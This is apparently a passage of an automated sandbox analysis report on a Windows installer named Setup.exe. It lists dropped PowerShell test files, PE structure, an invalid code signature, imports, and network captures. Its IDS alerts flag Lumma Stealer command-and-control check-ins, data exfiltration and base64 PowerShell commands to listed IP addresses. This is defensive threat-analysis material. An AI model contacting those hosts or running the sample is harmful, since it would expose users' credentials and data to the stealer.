                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4zcwmhn.knf.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwy4xa2n.tgp.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjjzo12u.5jh.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.981029632992097
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Setup.exe
                                                                                                                                File size:1'079'797 bytes
                                                                                                                                MD5:5efe766f54925452535ef011161edd16
                                                                                                                                SHA1:a03fdc832eece5fbed02c3987be9571098af24d4
                                                                                                                                SHA256:9262348e1aa8c196cd38efcca58146dca6c40ad5132744f96e6b7ced57eb8fcd
                                                                                                                                SHA512:5d16842613086e494202f475ff4bde170e70ba6d5ba05378f37c5351d231283b87796d715d43ab775be63cbf8e4e79518f8a48cd37ba98d60ea3d47443305c9f
                                                                                                                                SSDEEP:24576:MTX5rgUT0eB7tr4vQ2b2Od0dw/ugZbJany4fa0:wrj7cvrzWgR6Tr
                                                                                                                                TLSH:EB3533835FA48675D9017B3865F2965B8FBBFA512C20FB5F7B010DC82471A805E2877E
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                File Icon

                                                                                                                                Icon Hash:078e8c88f541631e

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x4038af
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                Authenticode Signature

                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 24/11/2023 12:20:30 23/11/2026 12:20:29
                                                                                                                                Subject Chain
                                                                                                                                • E=wxhere@hotmail.com, CN=Xing Wang, O=Xing Wang, L=Shanghai, C=CN
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:7A742F7A11DA60D6B28ED77287CB1B98
                                                                                                                                Thumbprint SHA-1:D1CDF37E4A61C7F13F8DF0BFA4A4A26BAB7AE33B
                                                                                                                                Thumbprint SHA-256:FD3D28462CA469508569FB0D4DE9C956D168989F192D0558BF9A5FB288DAA54C
                                                                                                                                Serial:48B06EDB116D54BE21D51656D91CF246

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebx
                                                                                                                                push ebp
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                push 00000020h
                                                                                                                                xor ebp, ebp
                                                                                                                                pop esi
                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                mov dword ptr [esp+10h], 0040A268h
                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                call dword ptr [00409030h]
                                                                                                                                push 00008001h
                                                                                                                                call dword ptr [004090B4h]
                                                                                                                                push ebp
                                                                                                                                call dword ptr [004092C0h]
                                                                                                                                push 00000008h
                                                                                                                                mov dword ptr [0047EB98h], eax
                                                                                                                                call 00007F89985177ABh
                                                                                                                                push ebp
                                                                                                                                push 000002B4h
                                                                                                                                mov dword ptr [0047EAB0h], eax
                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                push eax
                                                                                                                                push ebp
                                                                                                                                push 0040A264h
                                                                                                                                call dword ptr [00409184h]
                                                                                                                                push 0040A24Ch
                                                                                                                                push 00476AA0h
                                                                                                                                call 00007F899851748Dh
                                                                                                                                call dword ptr [004090B0h]
                                                                                                                                push eax
                                                                                                                                mov edi, 004CF0A0h
                                                                                                                                push edi
                                                                                                                                call 00007F899851747Bh
                                                                                                                                push ebp
                                                                                                                                call dword ptr [00409134h]
                                                                                                                                cmp word ptr [004CF0A0h], 0022h
                                                                                                                                mov dword ptr [0047EAB8h], eax
                                                                                                                                mov eax, edi
                                                                                                                                jne 00007F8998514D7Ah
                                                                                                                                push 00000022h
                                                                                                                                pop esi
                                                                                                                                mov eax, 004CF0A2h
                                                                                                                                push esi
                                                                                                                                push eax
                                                                                                                                call 00007F8998517151h
                                                                                                                                push eax
                                                                                                                                call dword ptr [00409260h]
                                                                                                                                mov esi, eax
                                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                                jmp 00007F8998514E03h
                                                                                                                                push 00000020h
                                                                                                                                pop ebx
                                                                                                                                cmp ax, bx
                                                                                                                                jne 00007F8998514D7Ah
                                                                                                                                add esi, 02h
                                                                                                                                cmp word ptr [esi], bx

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x14e5e.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1052650x2790.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x1000000x14e5e0x150000d11f1469463277013fa19b9f85cb853False0.9764346168154762data7.918056882282238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x1150000xfd60x1000f1c63e7efb51bb0b964b9d970f099faaFalse0.5986328125data5.60167986217944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x1001c00xe8afPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9888361005254587
                                                                                                                                RT_ICON0x10ea700x5e78PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9992143565994046
                                                                                                                                RT_DIALOG0x1148e80x100dataEnglishUnited States0.5234375
                                                                                                                                RT_DIALOG0x1149e80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                RT_DIALOG0x114b040x60dataEnglishUnited States0.7291666666666666
                                                                                                                                RT_GROUP_ICON0x114b640x22dataEnglishUnited States0.9411764705882353
                                                                                                                                RT_MANIFEST0x114b880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-08T01:46:02.055856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449869104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:03.213487+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449869104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:03.213487+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449869104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:04.543705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449878104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:05.391543+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449878104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:05.391543+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449878104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:07.010162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449885104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:09.186930+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449891104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:11.378177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449897104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:13.971378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449902104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:16.219501+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449908104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:18.586208+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449915104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:19.376501+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449915104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:20.603874+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449920104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:21.457500+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449920104.21.36.51443TCP
                                                                                                                                2024-12-08T01:46:22.813737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449926104.20.4.235443TCP
                                                                                                                                2024-12-08T01:46:25.362993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449933104.21.26.127443TCP
                                                                                                                                2024-12-08T01:46:26.021625+01002025011ET MALWARE Powershell commands sent B64 21104.21.26.127443192.168.2.449933TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 8, 2024 01:46:00.837064028 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:00.837083101 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:00.837234020 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:00.840157032 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:00.840172052 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:02.055674076 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:02.055855989 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:02.057399035 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:02.057406902 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:02.057610035 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:02.104402065 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:02.105178118 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:02.105211973 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:02.105237007 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.213505983 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.213574886 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.215838909 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.237247944 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.237261057 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.237291098 CET49869443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.237297058 CET44349869104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.333161116 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.333184958 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:03.333251953 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.333646059 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:03.333662987 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:04.543504953 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:04.543704987 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:04.544859886 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:04.544872999 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:04.545077085 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:04.548926115 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:04.548943996 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:04.548983097 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.391577959 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.391707897 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.391733885 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.391747952 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.391767025 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.391805887 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.391928911 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.400034904 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.400075912 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.400084019 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.408468008 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.408533096 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.408541918 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.463782072 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.463789940 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.510667086 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.511132002 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.557542086 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.557554960 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.583374977 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.583447933 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.583458900 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.587438107 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.587492943 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.629205942 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.629220963 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.629246950 CET49878443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.629254103 CET44349878104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.791927099 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.791937113 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:05.792004108 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.792525053 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:05.792535067 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.010083914 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.010162115 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.011293888 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.011296988 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.011499882 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.012865067 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.012994051 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.013021946 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.013287067 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.013292074 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.951200008 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.951268911 CET44349885104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.951469898 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.951495886 CET49885443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.971997023 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.972007990 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:07.972098112 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.972392082 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:07.972402096 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:09.186757088 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:09.186929941 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:09.188076973 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:09.188081980 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:09.188275099 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:09.189493895 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:09.189623117 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:09.189649105 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:10.080503941 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:10.080574989 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:10.080630064 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:10.080801010 CET49891443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:10.080806971 CET44349891104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:10.156573057 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:10.156585932 CET44349897104.21.36.51192.168.2.4
